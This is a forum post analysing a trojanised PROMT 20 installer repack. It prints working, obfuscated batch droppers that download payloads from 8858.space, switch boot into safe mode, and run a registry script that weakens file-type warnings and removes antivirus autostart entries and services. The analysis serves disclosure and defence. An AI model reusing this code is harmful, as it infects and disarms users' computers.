Eastoop ®
Curator of PDAs and Mobile Phones
Moderator of Books and Software
Promt 20 (Professional, Expert, Master, Freelance, MS Office) + Dictionaries Collection [Multi/Ru]

Of the 6 distribution packages, one turned out to be repacked: PROMT_20_Professional.exe. Details of the check for virus activity.

1. The user's suspicion of a virus was raised by the distribution's missing digital signature. The releaser was unable to detect the virus and infected his own computer. When the setup file was force-unpacked with 7Z, it turned out that the unpacking does not complete, but the installer configuration was nevertheless obtained. It turned out that the repack was done with Smart Install Maker and, besides unpacking the distribution, a batch of files for downloading viruses is loaded into the system.

2. Running it on a virtual machine made it possible to obtain the set of these starter files. When the infected installer is run, the file set-up.exe (the original installer) is unpacked into the windows folder, which takes a long time because of the file's large size, along with the file a.bat, which is launched right away. The folders wget and curl, which the batch file relies on, are also created in the windows folder.

Code:
```
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "gdfg5=W"
s%j%%a3% "a1=h"
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "k=at"
s%j%%a3% "aa2=l"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
::
::-----------------------------------------------------------------
:: e: %j%%f%%j% m: m%xj66%%n3%
::--------------------------------------| |------------------
%s5% %a4%%r8% %g1%%hy%S%j%%a3%-u%a2%%a5%%j%%f%%j%
%n3%f %j%%f%%n3%s%a3% "%g1%%hy%y%a5%t%f%t" d%j%l %0
:: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: ::
s%j%t osver=Unknown
v%j%r | findstr /IL "5.1." > nul
%n3%F %errorlevel% EQU 0 s%j%t "osver=Windows_XP"
%n3%F %osver% == Windows_XP %dn% go%a3%o n %e9% %j%ls%j% %dn% go%a3%o y %e9%
:y
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %zx3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%zx3% %%i %gs1% %dn%%zx3%%ss%%zx3%%e9% d%fsf4% s%j%%a3% %%~i
set "ua=%sid%"
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%b%%k%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%c44%%gfg33%%a2%%a1%%gt12%%zx3% %kl%%kl%u%xj66%e%pi%%kl%%c44%g%j%n%a3%%yt%%zx3%%ua%%zx3%
%n3%f %j%%f%%n3%st %zx3%%g1%%a4%%b%%a5%%b%%k%%zx3% %dn%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%j%%f%%j%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%gt12%%aa2%%a2%%a1%%c44%%zx3%
%s5% %a4%%r8% %g1%%hy%%b%%a5%%j%%f%%j%
%e9% %j%%aa2%s%j% %dn% go%a3%o n %e9%
d%j%l %0
:n
d%j%%aa2% %0
::
```

Code:
```
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
set "yui=5"
set "zx3=""
set "gs1=in"
set "a5=."
set "c44=a"
set "dn=("
set "gdfg5=W"
set "a1=h"
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "gfg33=l"
set "pi=r"
set "k=at"
set "aa2=l"
set "hy=\"
set "b=b"
set "gt12=a"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
::
::-----------------------------------------------------------------
:: e: exe m: msi
::--------------------------------------| |------------------
start /normal %windir%\Set-up.exe
if exist "%windir%\y.txt" del %0
set osver=Unknown
ver | findstr /IL "5.1." > nul
iF %errorlevel% EQU 0 set "osver=Windows_XP"
iF %osver% == Windows_XP ( goto n ) else ( goto y )
:y
set ss=s.txt
for /f "usebackq delims=" %%i in ("%ss%") do set %%~i
set "ua=%sid%"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="%sid%"
if exist "%windir%/b.bat" (
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.exe" --referer="alpha"
start /normal %windir%\b.exe
) else ( goto n )
del %0
:n
del %0
::
```

3. As a result of the batch file's execution, two more files are downloaded into the windows folder: b.bat and b.exe. The first continues downloading the next batch of files, and the second provides protection and restoration of the batch file, as well as its operation.

Code:
```
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "ssd3=R"
s%j%%a3% "a1=h"
s%j%%a3% "dfg=="
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "lkj6=K"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "yr3=""
s%j%%a3% "k=at"
s%j%%a3% "yfb={"
s%j%%a3% "aa2=l"
s%j%%a3% "vbvc56=O"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "gdg5=M"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
s%j%%a3% "mdp5=--%pi%%j%f%j%%pi%%j%%pi%"
s%j%%a3% "hg4=%c44%%gfg33%%a2%%a1%%gt12%"
::
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %yr3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%yr3% %%i %gs1% %dn%%yr3%%ss%%yr3%%e9% d%fsf4% s%j%%a3% %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
:: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: ::
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_n%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_f%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%u%xj66%w%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%%c44%t%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a3%%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%m%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%pi%%j%g%j%d%n3%t %a4%s %g1%%hy%c%a5%r%j%g
bc%bf5%%j%d%n3%t %a4%s%j%t %yr3%%yfb%cu%pi%r%j%n%a3%}%yr3% s%gt12%f%j%boo%a3% %yr3%m%n3%n%n3%m%gt12%%aa2%%yr3%
d%j%%aa2% %g1%%hy%b%a5%%j%%f%%j%
d%j%l %g1%%hy%c%a5%r%j%g
%g1%%hy%cu%pi%%aa2%%hy%cu%pi%%aa2%%a5%%j%%f%%j% %yr3%%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%s%a2%%gt12%c%j%%a4%cu%pi%%aa2%%a4%%pi%un%n3%%a5%%a2%h%a2%?%xj66%ub%n3%d%yt%%pos%%sym%%sub%%yr3% %mdp5% %yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%y%a5%%a3%x%a3%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
d%j%%aa2% %0
::
```

Code:
```
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"
set "dn=("
set "ssd3=R"
set "a1=h"
set "dfg=="
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "lkj6=K"
set "gfg33=l"
set "pi=r"
set "yr3=""
set "k=at"
set "yfb={"
set "aa2=l"
set "vbvc56=O"
set "hy=\"
set "b=b"
set "gt12=a"
set "gdg5=M"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
set "mdp5=--referer"
set "hg4=alpha"
::
set ss=s.txt
for /f "usebackq delims=" %%i in ("s.txt") do set %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
::
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%rn%" /f /reg:32
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/e.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/usw.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/at.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/ct.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/et.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s %windir%\c.reg
bcdedit /set "{current}" safeboot "minimal"
del %windir%\b.exe
del %windir%\c.reg
%windir%\curl\curl.exe "http://8858.space/curl/runi.php?subid=%pid%_%sid%" --referer "alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/y.txt" --referer="alpha"
del %0
::
```

4. When b.bat is executed, several more files are downloaded. They work together, replicate themselves across system folders, register themselves in autorun and the task scheduler, disable booting into safe mode and the loading of antivirus software, and so on and so forth. List of downloaded files: at.reg c.bat c.exe c.reg ct.reg d.bat d.exe d.reg e.reg et.reg mgr_f.reg mgr_n.reg mt.reg usw.reg. Some of the files have identical content and simply duplicate each other to make removing the infection harder.

Code:
```
@echo off
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE4.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE3.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP20.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP19.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
